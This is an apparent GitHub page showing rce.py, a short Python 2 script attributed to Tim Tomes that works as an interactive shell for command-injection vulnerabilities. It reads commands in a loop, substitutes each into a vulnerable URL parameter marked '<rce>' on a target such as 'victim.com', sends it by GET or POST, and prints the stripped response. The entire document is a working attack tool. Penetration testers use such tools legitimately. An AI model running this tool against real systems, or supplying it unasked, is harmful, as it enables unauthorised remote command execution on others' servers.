-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathrce.py
executable file
·48 lines (42 loc) · 1.33 KB
/
rce.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
#!/usr/bin/python -tt
import sys, urllib, re, urlparse
def usage():
print """
rce.py - Tim Tomes (@LaNMaSteR53) (www.lanmaster53.com)
Usage:
./rce.py [options] ur<rce>l
Options:
-p - Use POST method instead of GET. Enter url as GET.
-h - Help. This menu.
<rce> - Location of vulnerable parameter.
Example:
./rce.py 'http://victim.com/query?vulnparam=<rce>&safeparam=value'
- Sends the attack as a GET request, replacing '<rce>' with the payload.
./rce.py -p 'http://victim.com/query?vulnparam=<rce>&safeparam=value'
- Parses the parameters from the url and sends the attack as a POST request, replacing '<rce>' with the payload.
"""
sys.exit()
base_url = ''
for arg in sys.argv:
if arg.find('://') != -1:
base_url = arg
break
if base_url == '': usage()
if '-h' in sys.argv:
usage()
post = False
if '-p' in sys.argv:
post = True
print "Type 'exit' to quit."
while True:
cmd = raw_input("cmd> ")
if cmd.lower() == 'exit': sys.exit(2)
url = base_url.replace('<rce>', cmd)
if post:
(ignore, ignore, ignore, params, ignore) = urlparse.urlsplit(url)
site = url[:url.find(params)-1]
result = urllib.urlopen(site, urllib.urlencode(params)).read()
else:
result = urllib.urlopen(url).read()
result = re.sub("<\/*\w+?>", '', result)
print '[*] Executed: %s\n%s' % (cmd, result)